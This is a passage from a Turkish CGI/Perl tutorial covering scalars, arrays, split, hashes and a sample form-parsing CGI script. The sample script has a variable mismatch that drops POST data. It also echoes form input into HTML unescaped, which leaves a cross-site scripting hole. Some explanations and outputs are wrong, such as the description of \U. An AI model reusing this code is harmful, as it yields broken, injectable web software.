Peki, yukarıda erken davranıp yazdığımız $ (Dolar) işareti ne anlama geliyor? Bu, Perl’e bu bu değişkenin
türünü anlatıyor. Veriler, işlendikleri sırada bilgisayarın belleğinde bir yere yazılır. Perl, her veriye belirli
bir boyutta bellek alanı ayırmak zorundadır. Dolayısıyla bir değişken tanımlarken, Perl’e bu veriye ne
kadar yer ayıracağını belirtebilmek amacıyla, değişkenin adının önüne koyduğumuz işaretle değişkenin
içinde ne tür bilgi olacağını da söylemek zorundayız.

Perl için gerçekte bir tür değişken vardır: Scalar. Veya Türkçe başka kaynaklarda görebileceğiniz yazış
şekliyle Skalar. Scale, matematikte, bir cetvel (scale) üzerinde bir nokta demektir; scalar kelimesi, Unix
programlama dillerine matematikten geçmiş bir terimdir: burada bu kelimeyi “tek başına duran, bir
nokta, bir adet, tekil” gibi anlamak, Perl’ün veri iskeletini kavramayı kolaylaştırır. Perl’de bütün değişken
türleri, “tekil bir veri parçacığı” denen Scalar değişkenden türetilir.


CGI / Perl                                               38
“Vildan” adlı teyzenizi düşünün. Tanıdığınız sadece bir teyzeniz var ve onun adı da Vildan. Yani “Teyze =
Vildan”. Peki, bunu Perl terimleriyle yazalım:

    $teyze = “Vildan”

Benim de bir kardeşim var diyelim: “Kardeş = Mustafa”. Bunu Perl terimleriyle ifade edelim:

    $kardes = “Mustafa”

Yani yek başına duran, bir yığın veri arasında tek başına ele aldığımız tekil (Scalar) değişkenleri Perl’e
adlarının önüne $ işareti koyarak bildiriyoruz. Bu değişkenin içine sadece karakter-dizesi (String) değil,
sayı da koyabiliriz. Perl, başka diller gibi verilerinin türü konusunda zorluk çıkartmaz programcıya.

Devam edelim: Sizin Vildan Teyze’nizle, benim kardeşim Mustafa ve asker arkadaşı Kudret hep birlikte,
Osman’ın arkadaşları ise, bu Osman açısından nasıl bir durum arzeder: “Arkadaşlar = Vildan, Mustafa,
Kudret”

Peki bunu Perl’e nasıl söyleyebiliriz? Şimdi artık Osman’ın arkadaşları tek başına değerler değil, bir liste.
Bu kelimeye dikkat edin: Liste. Böylece Scalar değişkenden listeye geçiyoruz. Liste, veya programcılık
diliyle Array (Dizilmiş değişkenler, Dizi), birden fazla değer içerir. Veya içerebilir; içi boş dizi de olabilir
Perl’de. Bunu, İngilizce adıyla “at” [et okunur] işareti (@) ile yazarız:

    @arkadas = (‘Vildan’, ‘Mustafa’, ‘Kudret’)

Perl, bu ifadeyi görünce, içinde üç üyesi bulunan bir dizi oluşturur; adını “arkadaş2 koyduğu bu dizinin
içine üç değer yazar: Vildan, Mustafa ve Kudret.

Perl açısından @arkadas dizisinin 1 numaralı üyesi Vildan mıdır, Mustafa mıdır? Perl’ün C’den
türetildiğini ve C’nin gereğinden uzun zaman aynı odada ve bilgisayarya başbaşa kalmış kişiler
tarafından üretildiğini söylemiş miydik? Evet, başkaca bir açıklama tarzı olmayan şekilde, Perl için 1
numaralı üye, Vildan değil, Mustafa’dır. Çünkü Perl de C gibi, saymaya 0’dan başlar. Yani 0 numaralı
“arkadas” dizisi üyesi Vildan’dır. Mesela Perl’e şu komutu versek:

    @arkadas = (‘Vildan’, ‘Mustafa’, ‘Kudret’);

    print $arkadas[0];

    Nasıl bir sonuç alırız? Şöyle:

    Vildan

Parantezin köşeli parantez olduğuna dikkat edin. Peki “print $arkadas[2];” nasıl bir sonuç verir:

    Kudret

Burada bir gariplik dikkatinizi çekmiyor mu? Array (Dizi) değişkenin adının önüne @ işareti koyduğumuz
halde, üyelerinin adlarını tek tek yazdırırken, neden tek başına duran değişkenler için kullandığımız $
işaretini kullanıyoruz! Tabiî, sorumuzun cevabı sorunun içinde var. Dizinin içindeki her bir üye, tekCGI / Perl                                              39
başına ele alındığı zaman tekil değişken demektir, yani Scalar değişken. Tekil (Scalar) değişkenlerin
işareti ne? Dolar işareti.

Bir dizinin bir üyesinin değerini başkanı bir değişkene almaya, Perl argosunda “Sclalar dilim çıkartmak”
denir! Sclalar dilimler, Scalar işaretiyle belirtilir. Sclalar dilimin değeri, Dizi’den bağımsız Scalar bir
değişkene verilebilir mi? Evet. Meselâ:

    $dost = $arkadas[1]

Hatta kelime haznesine kıran girdiği gibi bir durumla karşı karşıya iseniz, şu bile olabilir:

    $arkadas = $arkadas[1]

Perl, Sclalar “arkadas” ile bir Dizi’nin dilimi olan arkadas[1]’i ayırt edebilir. Ama bu elinizle hatayı davet
etmek olur. (Tekrar: parantezin köşeli olduğuna dikkat.)

Dizinin üyesini de değiştirmek mümkündür. Osman, arkadas dizisinin birinci üyesinin Vildan teyzesi
değil de başka bir kişi olmasını isterse, şu komutu verebilir:

    $arkadas[0] = ‘Tülay’

Bu durumda arkadas dizisinin üyeleri şöyle sıralanır: Tülay, Mustafa, Kudret. Peki, “Tülay” listenin
başına eklemek istiyoruz; fakat “Vildan” da listede kalsın! Bunu Perl’ün unshift() fonksiyonu ile
yapabiliriz:

    unshift (@arkadas, “Tülay”);

Bu durumda arkadas dizisi “Tülay Vildan Mustafa Kudret” şeklini alır. “Tülay” değerini dizinin başına
değil de sonuna eklemek isterseniz, bunu “push”() fonksiyonu ile yapabilirsiniz:

    push (@arkadas, “Tulay”);

Şimdi diziniz “Vildan Mustafa Kudret Tulay” şeklini aldı.

/////////////////////////////////KUTU/////////////////////

Dizileri saydırmak


Perl isterseniz size bir dizide kaç üye bulunduğunu söyleyebilir; ya da Perl size sonuncu üyenin
numarasını söyler; siz ona 1 ekleyerek toplam üye sayısını çıkartırsınız: $#arkadas değişkeni, bu dizideki
son üyesinin sıra numarasını verir. Örneğin:

    print $#arkadas;

komutu, 2 sayısını görüntüler. Buna 1 eklediğinizde dizinin eleman sayısını bulmuş olursunuz. CGI
programlarımızda bunu kullanacağımız yerler olacak.

//////////////////////KUTU BİTTİ//////////////////////


CGI / Perl                                              40
Bir dizinin bütün üyelerini görüntüleyebiliriz:

    print @arkadaş;

komutu ekrana “Tülay, Mustafa, Kudret” yazdırır.

Diziden üye çıkartmanız da mümkündür. Bunun için “shift” ve “pop”() fonksiyonlarını kullanabiliriz.
“shift” birinci, “pop” sonuncu elemanı çıkartır. Bu iki fonksiyondan yararlanarak, dizi elemanı değeri
tekil (Scalar) değişkene atayabiliriz. Şu koda bakın.

@sanatci = (‘Arif Sağ’, ‘Güler Duman’, ‘Sabahat Akkiraz’, ‘Davud Sulari’);

$solist = shift(@sanatcı);

print $solist;

Bu kod ekrana hangi ismi getirecektir? Tabiî, “Arif Sağ”. Peki, shift() yerine pop() fonksiyonunu
kullanırsak? Davud Sulari. “shift()” birinci elemanı, “pop()” ise sonuncu elemanı diziden çıkardır.

/////////////////////////KUTU/////////////////////

Özel Değişken: $_

Perl’ün özel bir değişkeni vardır: varsayılan değişken (defalut variable) adı verilen bu değişken, sizin
kontrolünüzde olmadan, sizin adınıza değer tutar. diyelim ki Perl’e bir dosyadan metin okutuyorsunuz;
okunan her satır bu değişkene yazılır. İlerde bu değişkenin kendiliğinden tuttuğu diğer işlem sonuçlarını
da göreceğiz. Perl bu değişkeni o kadar benimsemiştir ki, bir çok fonksiyona bir argüman vermezseniz,
Perl fonksiyonu $_ ile icra eder. Örnek:

$_ = “Dostu bulması zor, kaybetmesi kolaydır!”;

print();

Bu program ekrana “Dostu bulması zor, kaybetmesi kolaydır!” yazdırır.

////////////////////////KUTU BİTTİ//////////////////////

Splice ve Split


Fakat istiyoruz ki, listenin sadece başına veya sonuna ek yapmayalım; arzu ettiğimiz bir sıraya eleman
ekleyelim ve çıkartalım. Perl bunu yapabilir mi? Evet, Perl, aylarca yerinden kalkmadan bilgisayar
programlayanların hayatını kolaylaştırmak üzere geliştirilmiş bir dil olduğu için bu amaca yarayan
“splice()” fonksiyona sahiptir. Kelime anlamı “yapıştırmak, eklemek” olan “splice()” fonksiyonunun dört
argümanı vardır:

1. Değiştirilecek dizinin adı

2. Pozisyon: değişikliğe başlanacak eleman sıra numarası


CGI / Perl                                            41
3. Çıkartılacak eleman sayısı

4. Eklenen elemanların değerleri

Bunun örneklerini rakamlı bir dizide görürsek, kavraması kolay olur.

    @sayilar = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9);

    splice (@sayilar, 5, 1, (‘Ev’));

    print @sayilar;

Ekrana şu liste gelir:

    0, 1, 2, 3, 4, Ev, 6, 7, 8, 9

Listeden bir şey atmadan da listeye ek yapabiliriz:

    @sayilar = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9);

    splice (@sayilar, 5, 0, (‘Ev’));

    print @sayilar;

Ekrana şu liste gelir:

    0, 1, 2, 3, 4, Ev, 5, 6, 7, 8, 9

 Burada, 5’nci elemandan itibaren 0 eleman atıp (yani kimseyi atmayıp) bir değer ekliyoruz. İstersek,
“splice()” fonksiyonu ile hiç ek yapmadan istediğimiz pozisyondan istediğimiz kadar eleman
çıkartabiliriz:

    @sayilar = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9);

    splice (@sayilar, 5, 3, ());

    print @sayilar;

Ekrana şu liste gelir:

    0, 1, 2, 3, 4, 8, 9

Burada 5’nci elemandan itibaren 3 eleman attığımıza ve yerine boş bir liste koyduğumuza (yani hiç bir
şey koymadığımıza) dikkat edin. Bu fonksiyonu boş liste vermeden de (“splice (@sayilar, 5, 3);”)
yazabiliriz.

“splice” ile listeden çıkarttığınız bir elemanı, isterseniz bir başka tekil (Scalar) değişkene, birden fazla
elemanı bir başka bir dizi (Array) değişkene yazabilirsiniz:

    @sayilar = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9);

    $cikan_sayi = splice (@sayilar, 5, 1);CGI / Perl                                              42
     print $cikan_sayi;

Ekrana “5” sayısı gelir. Birden fazla elemanı çıkartıyorsak, bunları dizi değişkende tutmamız gerekir:

     @sayilar = (0, 1, 2, 3, 4, 5, 6, 7, 8, 9);

     @cikan_sayi = splice (@sayilar, 5, 3);

     print @cikan_sayi;

Ekrana “5, 6, 7” dizisi gelir.

//////////////////kutu////////////////////

Kolay liste!


Perl, belki de rapor yazma dili olduğu için, liste oluşturmada özel fonksiyonlara ve kolaylıklara sahiptir.
Örneğin çarpma işlemi (x), bir liste üzerinde bir argümanla uygulandığında, listenin üye sayısını argüman
sayısınca çoğaltır. Örneğin:

     @liste = (1, 5) x 5;

deyimi, şu sonucu verir:

     (1, 5, 1, 5, 1, 5, 1, 5, 1, 5,)

Perl, vereceğiniz iki tam sayının arasını da artan diziyle doldurabilir. Bunun için yanyana iki nokta (..)
kullanırız:

     @dizi = (1..5)

Bu durumda dizi adlı dizinin değeri şöyle olur: 1, 2, 3, 4, 5. Bu kolaylık sadece artan bir dizi için
mümkündür; aerası doldurulacak rakamlardanküçüğü önce, büyüğü sonra yazılmalıdır.

Perl aynı kolaylığı karakterler için de sağlar:

     @dizi = (‘a’ .. ‘h’)

Listemiz şu elemanlara sahip olur: a b, c, d, e, f, g, h

///////////////////////KUTU BİTTİ/////////////////

“split()” fonksiyonu, Perl’ün gerçekten bir bilgi çekme ve rapor yazdırma dili olduğunu kanıtlayan
fonksiyondur. Kelime anlamı “bölmek, ayırmak” olan “split()” fonksiyonu aynen bu işi yapar: Scalar
biçimindeki String’leri arzu ettiğiniz yerden ayrı ettiğiniz parçalara böler. CGI ile Web sitesindeni
Form’dan birbirine eklenerek gelen veri yumağını hatırlıyor musunuz: “isim=Mustafa+Durcan&yas=23”.
“split()” fonksiyonu olmasa idi, bu String’i anahtar/değer çiftlerine bölmek gerçekten zor olabilirdi.
Şimdi ise tek satırlık bir deyimle bunu yapabiliriz. “split” sadece böyle bir String’i bölmeye yaramaklaCGI / Perl                                               43
kalmaz, fakat sabit diskteki bir düzyazı dosyasını okuyabilir; onun cümlelerini bölebilir. Düzyazı dosyası
sekme veya virgülle ayırt edilmiş değerler içeren bir veritabanı dosyası olabilir; “split” ile böyle bir
veritabanını okutabilir; içindeki değerleri Perl programımızda ve onun yardımıyla Web sayfamızda
kullanabiliriz. Size boşuna baştan beri Perl iyi dildir, demiyorum!

“split” iki ya da üç argüman ile kullanılır:

1. Bölme noktası (delimiter=sınırlayıcı) olan karakter: bölmenin başlayacağı ve biteceği nokta.

2. Bölünecek String’i tutan değişkenin adı

3. Bölünerek elde edilecek listede bulunacak eleman sayısı.

Bölme noktasını iki bölü işareti arasına yazarız. Şimdi bu argümanların nasıl kullanıldığını örneklerle
görelim:

    $arkadas = “Mustafa Osman Vildan Kudret”;

    @arkadaslar = split(/ /, $arkadas);

Bu deyimleri irdeleyelim: Tekil-Scalar arkadas değişkeninin değeri “Mustafa Osman Vildan Kudret”
şeklinde. Bu değerin içindeki kelimeler aralık karakteri ile (boşlukla) ayrılmış. “split()” fonksiyonu ile bu
dört kelimeyi bağımsız değerler haline getirmek ve dört elemanlı arkadaslar dizi değişkenine (array)
atamak mümkündür. “split()” fonksiyonundan dönecek değerleri “@arkadaslar” değişkenine
eşitlemekle bunu yapabiliriz. “split()” fonksiyonunu yazarken bölme noktası olarak boşlukları seçmesini
iki bölü işaretinin arasına boşluk bırakarak belirtiyoruz; iki argüman virgülle ayrılıyor ve bu işlemin
yapılacağı değişkenin adını yazıyoruz.

Bunu anlayıp anlamadığınızı sınamak için size bir soru:

    print $arkadaslar[1];

fonksiyonu ekrana hangi değeri yazdırır? İpucu: Saymaya, 1’den değil 0’dan başlayın!

Diyelim ki Perl’e dosya okutmayı öğrendik ve içindeki değerler sekme (Tab karakteri) ile ayrılmış dört
değer bulunan bir satırı seçerek “$kayit” değişkeninin içine yazdırdık. (Merak etmeyin birazdan
öğreneceğiz Perl’e dosya okutmayı ve okuduğu satırlardan uygun olanını seçmeyi!) Şimdi istiyoruz ki,
birbirinden sekme ile ayrılmış bu dört değer, $soyadi, $adi, $no ve $not değişkenlerine atansın. Bunu
“split” ile şöyle yapabiliriz:

    ($soyadi, $adi, $no, $not) = split (/\t/, $kayit);

Bu dieyimi de irdeleyelim: birden fazla tekil-Scalar değişkene ayanı anda değer atayabilmek için “split()”
fonksiyonunun ortaya dört değer çıkartacağını bilmek zorundayız. $kayit değişkeninin içeriğini biliyoruz;
sekme ile ayrılmış dört bölümden oluşan bir String-dize içeriyor. “split()” fonksiyonuna bölme noktası
olarak bu kes sekme işaretini kullanmasını bildiriyoruz. Sekme veya Tab karakteri, Perl ve diğer
programlama dilleri açısından özel bir durum sayılır; bu karakteri elde eetmek için klavyede Tab tuşunaCGI / Perl                                             44
basamazsınız; bu tuş ekrana Tab karakteri çıkartmaz, imlecinizi ilerletmeye karar. Aynı şekilde Return
veya Enter tuşuna basarak ekrana yeni satır+satırbaşı (LF+CR) karakteri yazdıramazsınız; imlaç alttaki
satırın başına gider. Bu tür özel karakterleri “Escape Durumu” denen şekilde göstermeniz gerekir.
Perl’de özel karakterlerin gösterilmesi için önüne ters bölü işareti koyarak, simgesi olan harfi yazarız.
Sekme işaretinin simgesi “t” harfidir; dolayısıyla bölme noktasını belirteceğimiz iki bölü işaretinin
arasına ters-bölü işareti ile “t” harfini yazıyoruz. Sonra içeriğine bölme işleminin uygulanacağı
değişkenin adını veriyoruz.

//////////////////////KUTU////////////////////////

Özel Karakterlerin ‘Escape’ Durumu


\a   Zil veya bip sesi

\b   Backspace (Geri)

\e   Escape

\f   Form Feed (Yeni sayfa)

\l   İzleyen karakteri küçük harfe zorlar

\L   İzleyen bütün karakterleri küçük harfe zorlar

\n   New Line (Yeni satır)

\r   Carrie Return (Satır başı)

\t   Tab (Sekme)

\u   İzleyen karakteri büyük harfe zorlar

\U   İzleyen bütün karakterleri küçük harfe zorlar

\v   Vertical Tab (Dikey sekme)

/////////////////////////////KUTU BİTTİ//////////////////////

Bu iki örnekte, “split()” fonksiyonunun üçüncü argümanını kullanmadık. Şimdi bir örnekle onu görelim.
Diyelim ki yukarıdaki örnekte oluşturduğumuzu varsaydığımız $kayit değişkenindeki dört değerden ilk
ikisini $soyadi ve $adi değişkenlerine alalım; fakat öğrencinin numarası ile notunu bir arada üçüncü bir
değişkene yazdıralım. Yani “splik” işlevinin sekmelere bakarak dörde böleceği String’den dört değil üç
bağımsız String çıkartalım. Bunu şu deyimle sağlayabiliriz:

    ($soyadi, $adi, $no_not) = split (/\t/, $kayit, 3);
CGI / Perl                                            45
Burada, üç değişken adı verdiğimize dikkat ediyorsunuz. “split()” fonksiyonunu da yapacağı bölme
işleminin sonunda dört değil, üç bölüm çıkartmaya zorluyoruz. Bunu, bölenecek değişkenin adından
sonra koyduğumuz 3 rakamı sağlıyor.

”split()” fonksiyonunu, “URL şifrelenmiş” (URL Encoded) Form verilerinin değişken ve değer olarak
bölünmesi başta olmak üzere bir çok amaçla sık sık kullanacağız.

Hash! veya İlişkili Diziler


    Tekil-Scalar değişkeni gözünüzde nasıl canlandırırsınız? Bir kutu, içinde bir değer
olarak olarak değil mi? Kutunun üzerindeki etikette, bu değerin adı yazılı olabilir. Dizi ise
yanyana bir çok kutu olarak canlandırılabilir. Kutuların en başında bu dizinin adı, her bir
kutunun üzerinde ise kutunun sıra numarası bulunur. (0’dan başlayarak!)

    Şmdi şu tabloya bakın:

    Parça No     Parçanın Adı

    1234       32 MB RAM Çip

    2345       Soğutma vantilatörü

    3456       Pentium II – 400 MHz

    4567       Pentium III – 750 MHz

    6789       Matrox Millenium AGP Ekran Kartı

    Bu bilgileri Perl’de nasıl değişkenlere yazabilirsiniz? İsterseniz 10 ayrı tekil-Scalar
değişken oluşturur herbirinin içine bu on aynı veriyi girebilirsiniz:

    $ParcaNo01 = 1234

    $ParcaAdi01 = ‘32 MB RAM Çip’

    $ParcaNo02 = 2345

    $ParcaAdi01 = ‘Soğutma Vantilatörü’

    $ParcaNo03 = 3456

    $ParcaAdi01 = ‘Pentium II – 400 MHz’

    ......

    Ya da bir dizi-array değişken yapıp, bütün verileri içine koyabiliriz:
CGI / Perl                                          46
@Parcalar = (1234, ‘32 MB RAM Çip’, 2345, ‘Soğutma Vantilatörü’, 3456,
‘Pentium II – 400 MHz’....);

    Fakat her durumda, örneğin 1234 ile “32 MB RAM Çip” değerlerinin ilişkisi kaybolur.
Yani ihtiyaç halinde “1234 numaralı parçanın adı neydi acaba?” derseniz, bu iki değişken
tüürü de size hazır, kolay bir cevap veremez. Birinci türde, yani on ayrı tekil değişken
oluşturduğunuzda, hiç bir değişkenin diğeriyle ilişkisi olamaz. İkinci türde, değişkenlerin
sıra numaralarından yararlanarak bir ilişkilendirme mümkündür. Örneğin $Parcalar[0] ile
$Parcalar[1] , 2 ile 3, 4 ile 5... ilişkilendirilebilir: bunun için birinciler ikincilerin endeksi
sayılabilir. Fakat bu kolay bir iş değil. Fakat dedik ki, Perl hiç bir şey değilse, tam teşekküllü
bir liste programıdır diye! İşte bunun bir sonucu olarak Perl’de İlişkilli Dizi (Associative
Array) veya değer yazmak ve çağırmakta kullanılan Unix komutunun adıyla Hash Listesi
diye bir özel değişken türü vardır. Bu değişken türü, adının önüne yüzde (%) işareti
konarak belirtilir.

    İlişkili Dizi’lerde iki unsur bulunur: anahtar ve değer (key ve value). Her değerin bir
anahtarı; her anahtarın bir değeri vardır. Anahtar/değer çiftine Kayıt denir. İlişkili Dizi,
kayıtlardan oluşur. Bir ilişkili Dizi’de aynı adda iki anahtar olamaz; fakat farklı anahtarlar
aynı değere sahip olabilir.

    “Her anahtarın bir değeri; her değerin bir anahtarı vardır!” dedik. Bu yüzden örneğin
telefon defterinizi İlişkili Dizi olarak yazamazsınız; çünkü bir kişinin birden fazla telefonu
olabilir. Bunun gibi kısıtlamalar yüzünden İlişkili Dizi’lerin sınırlı kullanım alanı vardır. Fakat
Perl, göreceğimiz gibi bazı fonksiyonların sonucu olarak karşımıza İlişkili Dizi değişken
çıkartabilir; ayrıca bu tür değişken için kullanılmaya hazır bir çok fonksiyon vardır;
dolayısıyla biz uzun-uzun kendi fonksiyonlarımızı yazmak zorunda kalmayız.

    Şimdi parça listemizi İlişkili Dizi olarak yazalım:

%Parcalar = (1234, ‘32 MB RAM Çip’, 2345. ‘Soğutma Vantilatörü’, 3456,
‘Pentium II – 400 MHz’....);

    Yukarıdaki kod gerçi amacımıza ulaşmamızı sağlar; ama okuması, yazması kolay bir
biçimde değil. Perl 5 ile birlikte virgül (,) yerine, “=>” operatörünü kullanabilirsiniz.
Örneğin, aynı değişken şu deyimle de oluşturtulabilir:

%Parcalar = (1234 => ‘32 MB RAM Çip’

        2345 => ‘Soğutma Vantilatörü’

        3456 => ‘Pentium II – 400 MHz’

        ....


CGI / Perl                                          47
        6789 => ‘Matrox Millenium AGP Ekran Kartı’

        );

    Peki, anahtar buradaki gibi tek kelime, hatta sayı değil de birden fazla kelime içerek
bir String ise ne yapabiliriz? Anahtarı tırmak içine alırız. İşte farklı bir parça listesi İlişkili
Dizi biçiminde:

%Parcalar = (“RAM Çipleri” => ‘32 MB’

        “Soğutma vantilatörleri” => ‘Bronica’

        “CPU Çipi” => ‘Pentium II – 400 MHz’

        ....

        “AGP Ekran Kartı” => ‘Matrox Millenium’

        );

    İçi boş, yani üyeleri (anahtarları ve anahtarların değerleri) atanmamış İlişkili Dizi
oluşturulabilir:

    %YeniParcalar = ();

    Perl, daha sonra içini dolduracağınız bir dizi hazırlar ve bekler.

    Şimdi bir İlişkili Dizi değişkeninin anahtarını kullanarak, değerini bulalım ve bunu
tekil/scalar değişkene atayalım:

    $alınacak_parca = $Parçalar{“6789”};

    veya

    $alınacak_parca = $Parçalar{“AGP ekran Kartı”};

    Burada birinci kodda $alinacak_parca değişkeninin içeriği “Matarox Millenium AGP
Ekran Kartı” olurken, ikinci kodda “Matrox Millenium” olur.

    Şimdi de İlişkili Dizi’mizin bir anahtarının değerini değiştirelim. Bunun için bir
anahtara değer vermemiz gerekir:

    $Parcalar{“RAM Çipleri”} = “64 MB”;

    (burada kullandığımız parantezin süslü parantez olduğuna dikkat edin!) Yukarıda
içine “32 MB” yazdığımız “RAM Çipleri” anahtarının değerini “64 MB” olarak değiştirmiş
olduk. Böyle bir deyimle karşılan Perl, önce “Parcalar” adlı İlişkizi Dizi içinde “RAM Çipleri”
anahtarı bulunup bulunmadığına bakar; varsa değerini yeni verdiğimiz String ile değiştirir.
ilişkili Dizi’de verdiğimiz adda bir anahtar yoksa, bu anahtar oluşturulur ve değer olarakCGI / Perl                                          48
verdiğimiz String atanır. Bu yöntemle içi boş İlişkili Dizi’de anahtar oluşturabiliriz. Yukarıda
oluşturduğumuz içi boş “YeniParcalar” İlişkili Dizi’sine yer anahtar açalım ve içine bir değer
yazalım:

    $YeniParcalar{“RAM Çipleri”} = “128 MB”;

    Mevcut bir İlişkili Dizi’nin anahtar/değer çiftini (yani kaydını) tümüyle silebiliriz;
bunun için delete fonksiyonunu kullanırız. delete fonksiyonuna argüman olarak silinecek
kaydın sadece anahtarını verirsiniz. Şöyle:

    delete($Parcalar{“RAM Çipleri”});

    delete bir fonksiyondur; dolayısıyla bir “return” değeri vardır; Perl’e bir değer verir.
Bu değer, sildiğiniz anahtarın değeridir. İsterseniz, bu değeri bir tekil/Scalar değişkene
atayabilirsiniz. (Nasıl?)

    İlişkili Dizi’lerin kendi kolaylıkları vardır, demiştik. delete bunlardan biridir; diğeri ise
keys fonksiyonudur. keys fonksiyonu bir ilişkili Dizi’nin bütün anahtarlarının listesini verir.
Örneğin:

    @Parcalar_anahtarlar = keys(%Parcalar);

    deyimi ile “Parcalar_anahtarlar” adlı bir dizi değişken (array) oluşturuyoruz ve
“Parcalar” adlı İlişkili Dizi’nin bütün anahtarlarını değer olarak atıyoruz. Dikkat edin!
Anahtarların adlarını değer olarak atılyoruz; anahtarların değerlerini değil. Peki bu ne işe
yarar? Bir örnek şu olabilir: Web sitemizdeki Form’dan gelen bilgileri tutan İlişkili Dizi’de
yer alan anahtarları ve onların değerlerini kullanılır hale getirmek isteyebiliriz. Bunun
örneğini ilerde göreceğiz. Fakat bir noktaya işaret edelim. İlişkili Dizi’nin içindeki anahtarlar
alfabetik veya azalan-çoğalan bir sırada tutulmaz; tesadüfî (random) bir sıra ile tutulur.
Dolayısıyla bu anahtarların adlarını yazdırdığımız yeni dizi değişkenin içeriği de sıralı
olmayacaktır. Bu işlemi sort fonksiyonun geçirerek yaparsak, yeni dizi değişkenimizin
içeriği sıralanmış olur:

    @Parcalar_anahtarlar = sort(keys(%Parcalar));

    İlişkili Dizi’yi kullanışlı hale getiren hazır fonksiyonlardan bir diğeri ise anahtarların
değerlerini edinmemizi sağlayan values fonksiyonudur. Bu fonksiyon, bir İlişkili Dizi’nin tüm
değerlerini verir.

    @Parcalar_degerler = values(%Parcalar);

    deyimi ile “Parcalar_degerler” adlı bir dizi değişken (array) oluşturuyoruz ; bu kez
“Parcalar” adlı İlişkili Dizi’nin bütün değerlerini değer olarak atıyoruz. Burada dikkatCGI / Perl                                         49
edilecek nokta, yeni dizi değişkenimizin bazı değerlerinin aynı olabileceğidir. İlişkili Dizi’de
her anahtar özgün olmalıdır; anahtar adları aynı olamaz, fakat farklı anahtarlar aynı değere
sahip olabilir, demiştik. Dolayısıyla values fonksiyonu ile oluşturduğumuz yeni dizi
değişkende bazı değerler aynı olabilir.

    Anahtarlar gibi, İlişkili Dizi’nin içindeki değerler de alfabetik veya azalan-çoğalan bir
sırada tutuldığı tesadüfî (random) bir sıra ile tutulduğu için yeni dizi değişkenin içeriği de
sıralı olmaz. Bu işlemi de sort fonksiyonundan geçirebiliriz; yeni dizi değişkenimizin içeriği
sıralanmış olur:

    @Parcalar_degerler = sort(values(%Parcalar));

    Buraya kadar yine bir çok şeyi bir arada öğrendik; durum biraz nefes almak ve bir
örnek yapmak iyi olur. Şimdi açın Not Defterini (veya en beğendiğiniz düz yazı programını
ve sizinle birlikte basit bir form oluşturalım. İçinde form olan HTML kodumuz şöyle olabilir:


 <HTML>

 <HEAD>

 <meta http-equiv="content-type" content="text/html; charset=ISO-8859-9">

 <meta http-equiv="Content-Type" content="text/html; charset=windows-1254">

 <meta http-equiv="Content-Language" content="tr">

 <TITLE>Sizinle nasil temas kuralim</TITLE>

 </HEAD>

 <BODY>

 <H1>Sizinle nasıl temas kuralım?</H1>

 <FORM NAME="temasform" ACTION="form_analiz.pl" METHOD="Post">

 <P>Adınız: <INPUT TYPE="text" NAME="Adi" SIZE="37" maxlength="25"></P>

 <P>Adresiniz: <INPUT TYPE="text" NAME="Adres" SIZE="37"></P>

 <P>Posta Kodu: <INPUT TYPE="text" NAME="Kod" size="37" maxlength="5"></P>

 <P>E-Posta: <INPUT TYPE="text" NAME="eposta" size="37"></P>

 <P>Eğitim: <INPUT TYPE="checkbox" NAME="ilkokul" value="ON">Ilk

        <INPUT TYPE="checkbox" NAME="Orta" value="ON">Orta

        <INPUT TYPE="checkbox" NAME="yuksek" value="ON">Yüksek
CGI / Perl                                        50
 <P>Merak Alanı: <SELECT NAME="Merak" SIZE="1">

    <OPTION SELECTED VALUE="Bir alan seçiniz">Bir alan seçiniz</OPTION>

    <OPTION VALUE="Polisiye">Polisiye</OPTION>

    <OPTION VALUE="Siir">Şiir</OPTION>

    <OPTION VALUE="Tarih">Tarih</OPTION>

    <OPTION VALUE="Siyaset">Siyaset</OPTION></SELECT>

 <P>Bize iletmek istediğiniz bir mesaj var mı?</P>

 <TEXTAREA ROWS="5" NAME="mesaj" cols="33">Mesajınızı buraya yazınız:
 </TEXTAREA>

 <p><INPUT TYPE="submit" VALUE="Gönder" name="Gonder"> <INPUT TYPE="reset"
 VALUE="Sil" name="Sil"></P>

 </FORM>

 </BODY>

 </HTML>    Bu Form’da kullandığımız etiketleri tanıyor ve bir Web tasarımcısı olarak bu tür
Formları sık sık tasarlıyor olmalısınız. Bu kodu yazdıktan sonra form.htm adıyla kaydedin.
Bu ilkelere dayanan bir form şöyle olabilir:

<cgi-perl011.tif>

    Şimdi Form’un ACTION özelliğinde adı geçen Perl programını yazalım. Aşağıdaki
kodu da Not Defteri gibi bir düz yazı programında yazarak ve ACTION’da verdiğiniz isimle
kaydedin:


 #!/usr/local/bin/perl

 #form_analiz.pl if ($ENV{'REQUEST_METHOD'} eq 'GET') {

     @girdiler = split(/&/, $ENV{'QUERY_STRING'});

 } elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {

     read (STDIN, $depo, $ENV{'CONTENT_LENGTH'});CGI / Perl                                      51
     @girdi = split(/&/, $depo);

 } else {

     print "Content-type: text/html\n\n";

     print "<P>Formda bir hata var!";

 }

 foreach $girdi (@girdiler) {

     ($anahtar, $deger) = split (/=/, $girdi);

     $anahtar =~ tr/+/ /;

     $deger =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

     $deger =~ tr/+/ /;

     $deger =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

     $deger =~s/<!--(.|\n)*-->//g;

     if ($formveri{$anahtar}) {

        $formveri{$anahtar} .= ", $deger";

     } else {

        $formveri{$anahtar} = $deger;

     }

 }

 print "Content-type: text/html\n\n";

 print "<meta http-equiv=\"content-type\" content=\"text/html; charset=ISO-
 8859-9\">\n";

 print "<meta http-equiv=\"Content-Type\" content=\"text/html;
 charset=windows-1254\">\n";

 foreach $anahtar (sort keys(%formveri)) {

 print "<P><B>$anahtar</B> alanına <B>$formveri{$anahtar} </B>değeri
 girildi.";

 }Şimdi bu kodu irdeleyelim ve öğrendiklerimizi bu kodda belirleyelim, bilmediklerimizi öğrenelim.CGI / Perl                                          52
Mantıksal Sınama: if..Then Deyimi


Önce formun başındaki mantıksal sınama demiyi olan If ile yazılan bölüme dikkat edin. Daha sonra
döngüleri ele alacağız; ama kısaca belirtelim: burada çevre (Environment) değişkenlerimizden
REQUEST_METHOD’un içeriğine bakıyoruz ve bu GET ise çevre değişkenlerinden QUERY_STRING’i
